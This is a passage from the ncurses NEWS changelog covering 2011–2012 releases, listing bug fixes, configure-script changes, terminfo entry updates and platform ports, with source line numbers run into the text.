that. 323 + undo recent change to fallback definition of vsscanf() to build with 324 older Solaris compilers (cf: 20120728). 325 326 20120908 327 + add test-screens to test/ncurses to show 256-characters at a time, 328 to help with MinGW port. 329 330 20120903 331 + simplify varargs logic in lib_printw.c; va_copy is no longer needed 332 there. 333 + modifications for MinGW port to make wide-character display usable. 334 335 20120902 336 + regenerate configure script (report by Sven Joachim, cf: 20120901). 337 338 20120901 339 + add a null-pointer check in _nc_flush (cf: 20120825). 340 + fix a case in _nc_scroll_optimize() where the _oldnums_list array 341 might not be allocated. 342 + improve comparisons in configure.in for unset shell variables. 343 344 20120826 345 + increase size of ncurses' output-buffer, in case of very small 346 initial screen-sizes. 347 + fix evaluation of TERMINFO and TERMINFO_DIRS default values as needed 348 after changes to use --datarootdir (reports by Gabriele Balducci, 349 Roumen Petrov). 350 351 20120825 352 + change output buffering scheme, using buffer maintained by ncurses 353 rather than stdio, to avoid problems with SIGTSTP handling (report 354 by Brian Bloniarz). 355 356 20120811 357 + update autoconf patch to 2.52.20120811, adding --datarootdir 358 (prompted by discussion with Erwin Waterlander). 359 + improve description of --enable-reentrant option in README and the 360 INSTALL file. 361 + add nsterm-256color, make this the default nsterm -TD 362 + remove bw from nsterm-bce, per testing with tack -TD 363 364 20120804 365 + update test/configure, adding check for tinfo library. 366 + improve limit-checks for the getch fifo (report by Werner Fink). 367 + fix a remaining mismatch between $with_echo and the symbols updated 368 for CF_DISABLE_ECHO affecting parameters for mk-2nd.awk (report by 369 Sven Joachim, cf: 20120317). 370 + modify followup check for pkg-config's library directory in the 371 --enable-pc-files option to validate syntax (report by Sven Joachim, 372 cf: 20110716). 373 374 20120728 375 + correct path for ncurses_mingw.h in include/headers, in case build 376 is done outside source-tree (patch by Roumen Petrov). 377 + modify some older xterm entries to align with xterm source -TD 378 + separate "xterm-old" alias from "xterm-r6" -TD 379 + add E3 extended capability to xterm-basic and putty -TD 380 + parenthesize parameters of other macros in curses.h -TD 381 + parenthesize parameter of COLOR_PAIR and PAIR_NUMBER in curses.h 382 in case it happens to be a comma-expression, etc. (patch by Nick 383 Black). 384 385 20120721 386 + improved form_request_by_name() and menu_request_by_name(). 387 + eliminate two fixed-size buffers in toe.c 388 + extend use_tioctl() to have expected behavior when use_env(FALSE) and 389 use_tioctl(TRUE) are called. 390 + modify ncurses test-program, adding -E and -T options to demonstrate 391 use_env() versus use_tioctl(). 392 393 20120714 394 + add use_tioctl() function (adapted from patch by Werner Fink, 395 Novell #769788): 396 397 20120707 398 + add ncurses_mingw.h to installed headers (prompted by patch by 399 Juergen Pfeifer). 400 + clarify return-codes from wgetch() in response to SIGWINCH (prompted 401 by Novell #769788). 402 + modify resizeterm() to always push a KEY_RESIZE onto the fifo, even 403 if screensize is unchanged. Modify _nc_update_screensize() to push a 404 KEY_RESIZE if there was a SIGWINCH, even if it does not call 405 resizeterm(). These changes eliminate the case where a SIGWINCH is 406 received, but ERR returned from wgetch or wgetnstr because the screen 407 dimensions did not change (Novell #769788). 408 409 20120630 410 + add --enable-interop to sample package scripts (suggested by Juergen 411 Pfeifer). 412 + update CF_PATH_SYNTAX macro, from mawk changes. 413 + modify mk-0th.awk to allow for generating llib-ltic, etc., though 414 some work is needed on cproto to work with lib_gen.c to update 415 llib-lncurses. 416 + remove redundant getenv() cal in database-iterator leftover from 417 cleanup in 20120622 changes (report by Sven Joachim). 418 419 20120622 420 + add -d, -e and -q options to test/demo_terminfo and test/demo_termcap 421 + fix caching of environment variables in database-iterator (patch by 422 Philippe Troin, Redhat #831366). 423 424 20120616 425 + add configure check to distinguish clang from gcc to eliminate 426 warnings about unused command-line parameters when compiler warnings 427 are enabled. 428 + improve behavior when updating terminfo entries which are hardlinked 429 by allowing for the possibility that an alias has been repurposed to 430 a new primary name. 431 + fix some strict compiler warnings based on package scripts. 432 + further fixes for configure check for working poll (Debian #676461). 433 434 20120608 435 + fix an uninitialized variable in -c/-n logic for infocmp changes 436 (cf: 20120526). 437 + corrected fix for building c++ binding with clang 3.0 (report/patch 438 by Richard Yao, Gentoo #417613, cf: 20110409) 439 + correct configure check for working poll, fixing the case where stdin 440 is redirected, e.g., in rpm/dpkg builds (Debian #676461). 441 + add rpm- and dpkg-scripts, to test those build-environments. 442 The resulting packages are used only for testing. 443 444 20120602 445 + add kdch1 aka "Remove" to vt220 and vt220-8 entries -TD 446 + add kdch1, etc., to qvt108 -TD 447 + add dl1/il1 to some entries based on dl/il values -TD 448 + add dl to simpleterm -TD 449 + add consistency-checks in tic for insert-line vs delete-line 450 controls, and insert/delete-char keys 451 + correct no-leaks logic in infocmp when doing comparisons, fixing 452 duplicate free of entries given via the command-line, and freeing 453 entries loaded from the last-but-one of files specified on the 454 command-line. 455 + add kdch1 to wsvt25 entry from NetBSD CVS (reported by David Lord, 456 analysis by Martin Husemann). 457 + add cnorm/civis to wsvt25 entry from NetBSD CVS (report/analysis by 458 Onno van der Linden). 459 460 20120526 461 + extend -c and -n options of infocmp to allow comparing more than two 462 entries. 463 + correct check in infocmp for number of terminal names when more than 464 two are given. 465 + correct typo in curs_threads.3x (report by Yanhui Shen on 466 freebsd-hackers mailing list). 467 468 20120512 469 + corrected 'op' for bterm (report by Samuel Thibault) -TD 470 + modify test/background.c to demonstrate a background character 471 holding a colored ACS_HLINE. The behavior differs from SVr4 due to 472 the thick- and double-line extension (cf: 20091003). 473 + modify handling of acs characters in PutAttrChar to avoid mapping an 474 unmapped character to a space with A_ALTCHARSET set. 475 + rewrite vt520 entry based on vt420 -TD 476 477 20120505 478 + remove p6 (bold) from opus3n1+ for consistency -TD 479 + remove acs stuff from env230 per clues in Ingres termcap -TD 480 + modify env230 sgr/sgr0 to match other capabilities -TD 481 + modify smacs/rmacs in bq300-8 to match sgr/sgr0 -TD 482 + make sgr for dku7202 agree with other caps -TD 483 + make sgr for ibmpc agree with other caps -TD 484 + make sgr for tek4107 agree with other caps -TD 485 + make sgr for ndr9500 agree with other caps -TD 486 + make sgr for sco-ansi agree with other caps -TD 487 + make sgr for d410 agree with other caps -TD 488 + make sgr for d210 agree with other caps -TD 489 + make sgr for d470c, d470c-7b agree with other caps -TD 490 + remove redundant AC_DEFINE for NDEBUG versus Makefile definition. 491 + fix a back-link in _nc_delink_entry(), which is needed if ncurses is 492 configured with --enable-termcap and --disable-getcap. 493 494 20120428 495 + fix some inconsistencies between vt320/vt420, e.g., cnorm/civis -TD 496 + add eslok flag to dec+sl -TD 497 + dec+sl applies to vt320 and up -TD 498 + drop wsl width from xterm+sl -TD 499 + reuse xterm+sl in putty and nsca-m -TD 500 + add ansi+tabs to vt520 -TD 501 + add ansi+enq to vt220-vt520 -TD 502 + fix a compiler warning in example in ncurses-intro.doc (Paul Waring). 503 + added paragraph in keyname manpage telling how extended capabilities 504 are interpreted as key definitions. 505 + modify tic's check of conflicting key definitions to include extended 506 capability strings in addition to the existing check on predefined 507 keys. 508 509 20120421 510 + improve cleanup of temporary files in tic using atexit(). 511 + add msgr to vt420, similar DEC vtXXX entries -TD 512 + add several missing vt420 capabilities from vt220 -TD 513 + factor out ansi+pp from several entries -TD 514 + change xterm+sl and xterm+sl-twm to include only the status-line 515 capabilities and not "use=xterm", making them more generally useful 516 as building-blocks -TD 517 + add dec+sl building block, as example -TD 518 519 20120414 520 + add XT to some terminfo entries to improve usefulness for other 521 applications than screen, which would like to pretend that xterm's 522 title is a status-line. -TD 523 + change use-clauses in ansi-mtabs, hp2626, and hp2622 based on review 524 of ordering and overrides -TD 525 + add consistency check in tic for screen's "XT" capability. 526 + add section in terminfo.src summarizing the user-defined capabilities 527 used in that file -TD 528 529 20120407 530 + fix an inconsistency between tic/infocmp "-x" option; tic omits all 531 non-standard capabilities, while infocmp was ignoring only the user 532 definable capabilities. 533 + improve special case in tic parsing of description to allow it to be 534 followed by terminfo capabilities. Previously the description had to 535 be the last field on an input line to allow tic to distinguish 536 between termcap and terminfo format while still allowing commas to be 537 embedded in the description. 538 + correct variable name in gen_edit.sh which broke configurability of 539 the --with-xterm-kbs option. 540 + revert 2011-07-16 change to "linux" alias, return to "linux2.2" -TD 541 + further amend 20110910 change, providing for configure-script 542 override of the "linux" terminfo entry to install and changing the 543 default for that to "linux2.2" (Debian #665959). 544 545 20120331 546 + update Ada95/configure to use CF_DISABLE_ECHO (cf: 20120317). 547 + correct order of use-clauses in st-256color -TD 548 + modify configure script to look for gnatgcc if the Ada95 binding 549 is built, in preference to the default gcc/cc (suggested by 550 Nicolas Boulenguez). 551 + modify configure script to ensure that the same -On option used for 552 the C compiler in CFLAGS is used for ADAFLAGS rather than simply 553 using "-O3" (suggested by Nicolas Boulenguez) 554 555 20120324 556 + amend an old fix so that next_char() exits properly for empty files, 557 e.g., from reading /dev/null (cf: 20080804). 558 + modify tic so that it can read from the standard input, or from 559 a character device. Because tic uses seek's, this requires writing 560 the data to a temporary file first (prompted by remark by Sven 561 Joachim) (cf: 20000923). 562 563 20120317 564 + correct a check made in lib_napms.c, so that terminfo applications 565 can again use napms() (cf: 20110604). 566 + add a note in tic.h regarding required casts for ABSENT_BOOLEAN 567 (cf: 20040327). 568 + correct scripting for --disable-echo option in test/configure. 569 + amend check for missing c++ compiler to work when no error is 570 reported, and no variables set (cf: 20021206). 571 + add/use configure macro CF_DISABLE_ECHO. 572 573 20120310 574 + fix some strict compiler warnings for abi6 and 64-bits. 575 + use begin_va_copy/end_va_copy macros in lib_printw.c (cf: 20120303). 576 + improve a limit-check in infocmp.c (Werner Fink): 577 578 20120303 579 + minor tidying of terminfo.tail, clarify reason for limitation 580 regarding mapping of \0 to \200 581 + minor improvement to _nc_copy_termtype(), using memcpy to replace 582 loops. 583 + fix no-leaks checking in test/demo_termcap.c to account for multiple 584 calls to setupterm(). 585 + modified the libgpm change to show previous load as a problem in the 586 debug-trace. 587 > merge some patches from OpenSUSE rpm (Werner Fink): 588 + ncurses-5.7-printw.dif, fixes for varargs handling in lib_printw.c 589 + ncurses-5.7-gpm.dif, do not dlopen libgpm if already loaded by 590 runtime linker 591 + ncurses-5.6-fallback.dif, do not free arrays and strings from static 592 fallback entries 593 594 20120228 595 + fix breakage in tic/infocmp from 20120225 (report by Werner Fink). 596 597 20120225 598 + modify configure script to allow creating dll's for MinGW when 599 cross-compiling. 600 + add --enable-string-hacks option to control whether strlcat and 601 strlcpy may be used. The same issue applies to OpenBSD's warnings 602 about snprintf, noting that this function is weakly standardized. 603 + add configure checks for strlcat, strlcpy and snprintf, to help 604 reduce bogus warnings with OpenBSD builds. 605 + build-fix for OpenBSD 4.9 to supply consistent intptr_t declaration 606 (cf:20111231) 607 + update config.guess, config.sub 608 609 20120218 610 + correct CF_ETIP_DEFINES configure macro, making it exit properly on 611 the first success (patch by Pierre Labastie). 612 + improve configure macro CF_MKSTEMP by moving existence-check for 613 mkstemp out of the AC_TRY_RUN, to help with cross-compiles. 614 + improve configure macro CF_FUNC_POLL from luit changes to detect 615 broken implementations, e.g., with Mac OS X. 616 + add configure option --with-tparm-arg 617 + build-fix for MinGW cross-compiling, so that make_hash does not 618 depend on TTY definition (cf: 20111008). 619 620 20120211 621 + make sgr for xterm-pcolor agree with other caps -TD 622 + make sgr for att5425 agree with other caps -TD 623 + make sgr for att630 agree with other caps -TD 624 + make sgr for linux entries agree with other caps -TD 625 + make sgr for tvi9065 agree with other caps -TD 626 + make sgr for ncr260vt200an agree with other caps -TD 627 + make sgr for ncr160vt100pp agree with other caps -TD 628 + make sgr for ncr260vt300an agree with other caps -TD 629 + make sgr for aaa-60-dec-rv, aaa+dec agree with other caps -TD 630 + make sgr for cygwin, cygwinDBG agree with other caps -TD 631 + add configure option --with-xterm-kbs to simplify configuration for 632 Linux versus most other systems. 633 634 20120204 635 + improved tic -D option, avoid making target directory and provide 636 better diagnostics. 637 638 20120128 639 + add mach-gnu (Debian #614316, patch by Samuel Thibault) 640 + add mach-gnu-color, tweaks to mach-gnu terminfo -TD 641 + make sgr for sun-color agree with smso -TD 642 + make sgr for prism9 agree with other caps -TD 643 + make sgr for icl6404 agree with other caps -TD 644 + make sgr for ofcons agree with other caps -TD 645 + make sgr for att5410v1, att4415, att620 agree with other caps -TD 646 + make sgr for aaa-unk, aaa-rv agree with other caps -TD 647 + make sgr for avt-ns agree with other caps -TD 648 + amend fix intended to separate fixups for acsc to allow "tic -cv" to 649 give verbose warnings (cf: 20110730). 650 + modify misc/gen-edit.sh to make the location of the tabset directory 651 consistent with misc/Makefile.in, i.e., using ${datadir}/tabset 652 (Debian #653435, patch by Sven Joachim). 653 654 20120121 655 + add --with-lib-prefix option to allow configuring for old/new flavors 656 of OS/2 EMX. 657 + modify check for gnat version to allow for year, as used in FreeBSD 658 port. 659 + modify check_existence() in db_iterator.c to simply check if the 660 path is a directory or file, according to the need. Checking for 661 directory size also gives no usable result with OS/2 (cf: 20120107). 662 + support OS/2 kLIBC (patch by KO Myung-Han). 663 664 20120114 665 + several improvements to test/movewindow.c (prompted by discussion on 666 Linux Mint forum): 667 + modify movement commands to make them continuous 668 + rewrote the test for mvderwin 669 + rewrote the test for recursive mvwin 670 + split-out reusable CF_WITH_NCURSES_ETC macro in test/configure.in 671 + updated configure macro CF_XOPEN_SOURCE, build-fixes for Mac OS X 672 and OpenBSD. 673 + regenerated html manpages. 674 675 20120107 676 + various improvments for MinGW (Juergen Pfeifer): 677 + modify stat() calls to ignore the st_size member 678 + drop mk-dlls.sh script. 679 + change recommended regular expression library. 680 + modify rain.c to allow for threaded configuraton. 681 + modify tset.c to allow for case when size-change logic is not used. 682 683 20111231 684 + modify toe's report when -a and -s options are combined, to add 685 a column showing which entries belong to a given database. 686 + add -s option to toe, to sort its output. 687 + modify progs/toe.c, simplifying use of db-iterator results to use 688 caching improvements from 20111001 and 20111126. 689 + correct generation of pc-files when ticlib or termlib options are 690 given to rename the corresponding tic- or tinfo-libraries (report 691 by Sven Joachim). 692 693 20111224 694 + document a portability issue with tput, i.e., that scripts which work 695 with ncurses may fail in other implementations that do no parameter 696 analysis. 697 + add putty-sco entry -TD 698 699 20111217 700 + review/fix places in manpages where --program-prefix configure option 701 was not being used. 702 + add -D option to infocmp, to show the database locations that it 703 could use. 704 + fix build for the special case where term-driver, ticlib and termlib 705 are all enabled. The terminal driver depends on a few features in 706 the base ncurses library, so tic's dependencies include both ncurses 707 and termlib. 708 + fix build work for term-driver when --enable-wgetch-events option is 709 enabled. 710 + use <stdint.h> types to fix some questionable casts to void*. 711 712 20111210 713 + modify configure script to check if thread library provides 714 pthread_mutexattr_settype(), e.g., not provided by Solaris 2.6 715 + modify configure script to suppress check to define _XOPEN_SOURCE 716 for IRIX64, since its header files have a conflict versus 717 _SGI_SOURCE. 718 + modify configure script to add ".pc" files for tic- and 719 tinfo-libraries, which were omitted in recent change (cf: 20111126). 720 + fix inconsistent checks on $PKG_CONFIG variable in configure script. 721 722 20111203 723 + modify configure-check for etip.h dependencies, supplying a temporary 724 copy of ncurses_dll.h since it is a generated file (prompted by 725 Debian #646977). 726 + modify CF_CPP_PARAM_INIT "main" function to work with current C++. 727 728 20111126 729 + correct database iterator's check for duplicate entries 730 (cf: 20111001). 731 + modify database iterator to ignore $TERMCAP when it is not an 732 absolute pathname. 733 + add -D option to tic, to show the database locations that it could 734 use. 735 + improve description of database locations in tic manpage. 736 + modify the configure script to generate a list of the ".pc" files to 737 generate, rather than deriving the list from the libraries which have 738 been built (patch by Mike Frysinger). 739 + use AC_CHECK_TOOLS in preference to AC_PATH_PROGS when searching for 740 ncurses*-config, e.g., in Ada95/configure and test/configure (adapted 741 from patch by Mike Frysinger). 742 743 20111119 744 + remove obsolete/conflicting fallback definition for _POSIX_SOURCE 745 from curses.priv.h, fixing a regression with IRIX64 and Tru64 746 (cf: 20110416) 747 + modify _nc_tic_dir() to ensure that its return-value is nonnull, 748 i.e., the database iterator was not initialized. This case is needed 749 to when tic is translating to termcap, rather than loading the 750 database (cf: 20111001). 751 752 20111112 753 + add pccon entries for OpenBSD console (Alexei Malinin). 754 + build-fix for OpenBSD 4.9 with gcc 4.2.1, setting _XOPEN_SOURCE to 755 600 to work around inconsistent ifdef'ing of wcstof between C and 756 C++ header files. 757 + modify capconvert script to accept more than exact match on "xterm", 758 e.g., the "xterm-*" variants, to exclude from the conversion (patch 759 by Robert Millan). 760 + add -lc_r as alternative for -lpthread, allows build of threaded code 761 in older FreeBSD machines. 762 + build-fix for MirBSD, which fails when either _XOPEN_SOURCE or 763 _POSIX_SOURCE are defined. 764 + fix a typo misc/Makefile.in, used in uninstalling pc-files. 765 766 20111030 767 + modify make_db_path() to allow creating "terminfo.db" in the same 768 directory as an existing "terminfo" directory. This fixes a case 769 where switching between hashed/filesystem databases would cause the 770 new hashed database to be installed in the next best location - 771 root's home directory. 772 + add variable cf_cv_prog_gnat_correct to those passed to 773 config.status, fixing a problem with Ada95 builds (cf: 20111022). 774 + change feature test from _XPG5 to _XOPEN_SOURCE in two places, to 775 accommodate broken implementations for _XPG6. 776 + eliminate usage of NULL symbol from etip.h, to reduce header 777 interdependencies. 778 + add configure check to decide when to add _XOPEN_SOURCE define to 779 compiler options, i.e., for Solaris 10 and later (cf: 20100403). 780 This is a workaround for gcc 4.6, which fails to build the c++ 781 binding if that symbol is defined by the application, due to 782 incorrectly combining the corresponding feature test macros 783 (report by Peter Kruse). 784 785 20111022 786 + correct logic for discarding mouse events, retaining the partial 787 events used to build up click, double-click, etc, until needed 788 (cf: 20110917). 789 + fix configure script to avoid creating unused Ada95 makefile when 790 gnat does not work. 791 + cleanup width-related gcc 3.4.3 warnings for 64-bit platform, for the 792 internal functions of libncurses. The external interface of courses 793 uses bool, which still produces these warnings. 794 795 20111015 796 + improve description of --disable-tic-depends option to make it 797 clear that it may be useful whether or not the --with-termlib 798 option is also given (report by Sven Joachim). 799 + amend termcap equivalent for set_pglen_inch to use the X/Open 800 "YI" rather than the obsolete Solaris 2.5 "sL" (cf: 990109). 801 + improve manpage for tgetent differences from termcap library. 802 803 20111008 804 + moved static data from db_iterator.c to lib_data.c 805 + modify db_iterator.c for memory-leak checking, fix one leak. 806 + modify misc/gen-pkgconfig.in to use Requires.private for the parts 807 of ncurses rather than Requires, as well as Libs.private for the 808 other library dependencies (prompted by Debian #644728). 809 810 20111001 811 + modify tic "-K" option to only set the strict-flag rather than force 812 source-output. That allows the same flag to control the parser for 813 input and output of termcap source. 814 + modify _nc_getent() to ignore backslash at the end of a comment line, 815 making it consistent with ncurses' parser. 816 + restore a special-case check for directory needed to make termcap 817 text files load as if they were databases (cf: 20110924). 818 + modify tic's resolution/collision checking to attempt to remove the 819 conflicting alias from the second entry in the pair, which is 820 normally following in the source file. Also improved the warning 821 message to make it simpler to see which alias is the problem. 822 + improve performance of the database iterator by caching search-list. 823 824 20110925 825 + add a missing "else" in changes to _nc_read_tic_entry(). 826 827 20110924 828 + modify _nc_read_tic_entry() so that hashed-database is checked before 829 filesystem. 830 + updated CF_CURSES_LIBS check in test/configure script. 831 + modify configure script and makefiles to split TIC_ARGS and 832 TINFO_ARGS into pieces corresponding to LDFLAGS and LIBS variables, 833 to help separate searches for tic- and tinfo-libraries (patch by Nick 834 Alcock aka "Nix"). 835 + build-fix for lib_mouse.c changes (cf: 20110917). 836 837 20110917 838 + fix compiler warning for clang 2.9 839 + improve merging of mouse events (integrated patch by Damien 840 Guibouret). 841 + correct mask-check used in lib_mouse for wheel mouse buttons 4/5 842 (patch by Damien Guibouret). 843 844 20110910 845 + modify misc/gen_edit.sh to select a "linux" entry which works with 846 the current kernel rather than assuming it is always "linux3.0" 847 (cf: 20110716). 848 + revert a change to getmouse() which had the undesirable side-effect 849 of suppressing button-release events (report by Damien Guibouret, 850 cf: 20100102). 851 + add xterm+kbs fragment from xterm #272 -TD 852 + add configure option --with-pkg-config-libdir to provide control over 853 the actual directory into which pc-files are installed, do not use 854 the pkg-config environment variables (discussion with Frederic L W 855 Meunier). 856 + add link to mailing-list archive in announce.html.in, as done in 857 FAQ (prompted by question by Andrius Bentkus). 858 + improve manpage install by adjusting the "#include" examples to 859 show the ncurses-subdirectory used when --disable-overwrite option 860 is used. 861 + install an alias for "curses" to the ncurses manpage, tied to the 862 --with-curses-h configure option (suggested by Reuben Thomas). 863 864 20110903 865 + propagate error-returns from wresize, i.e., the internal 866 increase_size and decrease_size functions through resize_term (report 867 by Tim van der Molen, cf: 20020713). 868 + fix typo in tset manpage (patch by Sven Joachim). 869 870 20110820 871 + add a check to ensure that termcap files which might have "^?" do 872 not use the terminfo interpretation as "\177". 873 + minor cleanup of X-terminal emulator section of terminfo.src -TD 874 + add terminator entry -TD 875 + add simpleterm entry -TD 876 + improve wattr_get macros by ensuring that if the window pointer is 877 null, then the attribute and color values returned will be zero 878 (cf: 20110528). 879 880 20110813 881 + add substitution for $RPATH_LIST to misc/ncurses-config.in 882 + improve performance of tic with hashed-database by caching the 883 database connection, using atexit() to cleanup. 884 + modify treatment of 2-character aliases at the beginning of termcap 885 entries so they are not counted in use-resolution, since these are 886 guaranteed to be unique. Also ignore these aliases when reporting 887 the primary name of the entry (cf: 20040501) 888 + double-check gn (generic) flag in terminal descriptions to 889 accommodate old/buggy termcap databases which misused that feature. 890 + minor fixes to _nc_tgetent(), ensure buffer is initialized even on 891 error-return. 892 893 20110807 894 + improve rpath fix from 20110730 by ensuring that the new $RPATH_LIST 895 variable is defined in the makefiles which use it. 896 + build-fix for DragonFlyBSD's pkgsrc in test/configure script. 897 + build-fixes for NetBSD 5.1 with termcap support enabled. 898 + corrected k9 in dg460-ansi, add other features based on manuals -TD 899 + improve trimming of whitespace at the end of terminfo/termcap output 900 from tic/infocmp. 901 + when writing termcap source, ensure that colons in the description 902 field are translated to a non-delimiter, i.e., "=". 903 + add "-0" option to tic/infocmp, to make the termcap/terminfo source 904 use a single line. 905 + add a null-pointer check when handling the $CC variable. 906 907 20110730 908 + modify configure script and makefiles in c++ and progs to allow the 909 directory used for rpath option to be overridden, e.g., to work 910 around updates to the variables used by tic during an install. 911 + add -K option to tic/infocmp, to provide stricter BSD-compatibility 912 for termcap output. 913 + add _nc_strict_bsd variable in tic library which controls the 914 "strict" BSD termcap compatibility from 20110723, plus these 915 features: 916 + allow escapes such as "\8" and "\9" when reading termcap 917 + disallow "\a", "\e", "\l", "\s" and "\:" escapes when reading 918 termcap files, passing through "a", "e", etc. 919 + expand "\:" as "\072" on output. 920 + modify _nc_get_token() to reset the token's string value in case 921 there is a string-typed token lacking the "=" marker. 922 + fix a few memory leaks in _nc_tgetent. 923 + fix a few places where reading from a termcap file could refer to 924 freed memory. 925 + add an overflow check when converting terminfo/termcap numeric 926 values, since terminfo stores those in a short, and they must be 927 positive. 928 + correct internal variables used for translating to termcap "%>" 929 feature, and translating from termcap %B to terminfo, needed by 930 tctest (cf: 19991211). 931 + amend a minor fix to acsc when loading a termcap file to separate it 932 from warnings needed for tic (cf: 20040710) 933 + modify logic in _nc_read_entry() and _nc_read_tic_entry() to allow 934 a termcap file to be handled via TERMINFO_DIRS. 935 + modify _nc_infotocap() to include non-mandatory padding when 936 translating to termcap. 937 + modify _nc_read_termcap_entry(), passing a flag in the case where 938 getcap is used, to reduce interactive warning messages. 939 940 20110723 941 + add a check in start_color() to limit color-pairs to 256 when 942 extended colors are not supported (patch by David Benjamin). 943 + modify setcchar to omit no-longer-needed OR'ing of color pair in 944 the SetAttr() macro (patch by David Benjamin). 945 + add kich1 to sun terminfo entry (Yuri Pankov) 946 + use bold rather than reverse for smso in sun-color terminfo entry 947 (Yuri Pankov). 948 + improve generation of termcap using tic/infocmp -C option, e.g., 949 to correspond with 4.2BSD (prompted by discussion with Yuri Pankov 950 regarding Schilling's test program): 951 + translate %02 and %03 to %2 and %3 respectively. 952 + suppress string capabilities which use %s, not supported by tgoto 953 + use \040 rather than \s 954 + expand null characters as \200 rather than \0 955 + modify configure script to support shared libraries for DragonFlyBSD. 956 957 20110716 958 + replace an assert() in _nc_Free_Argument() with a regular null 959 pointer check (report/analysis by Franjo Ivancic). 960 + modify configure --enable-pc-files option to take into account the 961 PKG_CONFIG_PATH variable (report by Frederic L W Meunier). 962 + add/use xterm+tmux chunk from xterm #271 -TD 963 + resync xterm-new entry from xterm #271 -TD 964 + add E3 extended capability to linux-basic (Miroslav Lichvar) 965 + add linux2.2, linux2.6, linux3.0 entries to give context for E3 -TD 966 + add SI/SO change to linux2.6 entry (Debian #515609) -TD 967 + fix inconsistent tabset path in pcmw (Todd C. Miller). 968 + remove a backslash which continued comment, obscuring altos3 969 definition with OpenBSD toolset (Nicholas Marriott). 970 971 20110702 972 + add workaround from xterm #271 changes to ensure that compiler flags 973 are not used in the $CC variable. 974 + improve support for shared libraries, tested with AIX 5.3, 6.1 and 975 7.1 with both gcc 4.2.4 and cc. 976 + modify configure checks for AIX to include release 7.x 977 + add loader flags/libraries to libtool options so that dynamic loading 978 works properly, adapted from ncurses-5.7-ldflags-with-libtool.patch 979 at gentoo prefix repository (patch by Michael Haubenwallner). 980 981 20110626 982 + move include of nc_termios.h out of term_entry.h, since the latter 983 is installed, e.g., for tack while the former is not (report by 984 Sven Joachim). 985 986 20110625 987 + improve cleanup() function in lib_tstp.c, using _exit() rather than 988 exit() and checking for SIGTERM rather than SIGQUIT (prompted by 989 comments forwarded by Nicholas Marriott). 990 + reduce name pollution from term.h, moving fallback #define's for 991 tcgetattr(), etc., to new private header nc_termios.h (report by 992 Sergio NNX). 993 + two minor fixes for tracing (patch by Vassili Courzakis). 994 + improve trace initialization by starting it in use_env() and 995 ripoffline(). 996 + review old email, add details for some changelog entries. 997 998 20110611 999 + update minix entry to minix 3.2 (Thomas Cort). 1000 + fix a strict compiler warning in change to wattr_get (cf: 20110528). 1001 1002 20110604 1003 + fixes for MirBSD port: 1004 + set default prefix to /usr. 1005 + add support for shared libraries in configure script. 1006 + use S_ISREG and S_ISDIR consistently, with fallback definitions. 1007 + add a few more checks based on ncurses/link_test. 1008 + modify MKlib_gen.sh to handle sp-funcs renaming of NCURSES_OUTC type. 1009 1010 20110528 1011 + add case to CF_SHARED_OPTS for Interix (patch by Markus Duft). 1012 + used ncurses/link_test to check for behavior when the terminal has 1013 not been initialized and when an application passes null pointers 1014 to the library. Added checks to cover this (prompted by Redhat 1015 #707344). 1016 + modify MKlib_gen.sh to make its main() function call each function 1017 with zero parameters, to help find inconsistent checking for null 1018 pointers, etc. 1019 1020 20110521 1021 + fix warnings from clang 2.7 "--analyze" 1022 1023 20110514 1024 + compiler-warning fixes in panel and progs. 1025 + modify CF_PKG_CONFIG macro, from changes to tin -TD 1026 + modify CF_CURSES_FUNCS configure macro, used in test directory 1027 configure script: 1028 + work around (non-optimizer) bug in gcc 4.2.1 which caused 1029 test-expression to be omitted from executable. 1030 + force the linker to see a link-time expression of a symbol, to 1031 help work around weak-symbol issues. 1032 1033 20110507 1034 + update discussion of MKfallback.sh script in INSTALL; normally the 1035 script is used automatically via the configured makefiles. However 1036 there are still occasions when it might be used directly by packagers 1037 (report by Gunter Schaffler). 1038 + modify misc/ncurses-config.in to omit the "-L" option from the 1039 "--libs" output if the library directory is /usr/lib. 1040 + change order of tests for curses.h versus ncurses.h headers in the 1041 configure scripts for Ada95 and test-directories, to look for 1042 ncurses.h, from fixes to tin -TD 1043 + modify ncurses/tinfo/access.c to account for Tandem's root uid 1044 (report by Joachim Schmitz). 1045 1046 20110430 1047 + modify rules in Ada95/src/Makefile.in to ensure that the PIC option 1048 is not used when building a static library (report by Nicolas 1049 Boulenguez): 1050 + Ada95 build-fix for big-endian architectures such as sparc. This 1051 undoes one of the fixes from 20110319, which added an "Unused" member 1052 to representation clauses, replacing that with pragmas to suppress 1053 warnings about unused bits (patch by Nicolas Boulenguez): 1054 1055 20110423 1056 + add check in test/configure for use_window, use_screen. 1057 + add configure-checks for getopt's variables, which may be declared 1058 as different types on some Unix systems. 1059 + add check in test/configure for some legacy curses types of the 1060 function pointer passed to tputs(). 1061 + modify init_pair() to accept -1's for color value after 1062 assume_default_colors() has been called (Debian #337095). 1063 + modify test/background.c, adding commmand-line options to demonstrate 1064 assume_default_colors() and use_default_colors(). 1065 1066 20110416 1067 + modify configure script/source-code to only define _POSIX_SOURCE if 1068 the checks for sigaction and/or termios fail, and if _POSIX_C_SOURCE 1069 and _XOPEN_SOURCE are undefined (report by Valentin Ochs). 1070 + update config.guess, config.sub 1071 1072 20110409 1073 + fixes to build c++ binding with clang 3.0 (patch by Alexander 1074 Kolesen). 1075 + add check for unctrl.h in test/configure, to work around breakage in 1076 some ncurses packages. 1077 + add "--disable-widec" option to test/configure script. 1078 + add "--with-curses-colr" and "--with-curses-5lib" options to the 1079 test/configure script to address testing with very old machines. 1080 1081 20110404 5.9 release for upload to 1082 1083 20110402 1084 + various build-fixes for the rpm/dpkg scripts. 1085 + add "--enable-rpath-link" option to Ada95/configure, to allow 1086 packages to suppress the rpath feature which is normally used for 1087 the in-tree build of sample programs. 1088 + corrected definition of libdir variable in Ada95/src/Makefile.in, 1089 needed for rpm script. 1090 + add "--with-shared" option to Ada95/configure script, to allow 1091 making the C-language parts of the binding use appropriate compiler 1092 options if building a shared library with gnat. 1093 1094 20110329 1095 > portability fixes for Ada95 binding: 1096 + add configure check to ensure that SIGINT works with gnat. This is 1097 needed for the "rain" sample program. If SIGINT does not work, omit 1098 that sample program. 1099 + correct typo in check of $PKG_CONFIG variable in Ada95/configure 1100 + add ncurses_compat.c, to supply functions used in the Ada95 binding 1101 which were added in 5.7 and later. 1102 + modify sed expression in CF_NCURSES_ADDON to eliminate a dependency 1103 upon GNU sed. 1104 1105 20110326 1106 + add special check in Ada95/configure script for ncurses6 reentrant 1107 code. 1108 + regen Ada html documentation. 1109 + build-fix for Ada shared libraries versus the varargs workaround. 1110 + add rpm and dpkg scripts for Ada95 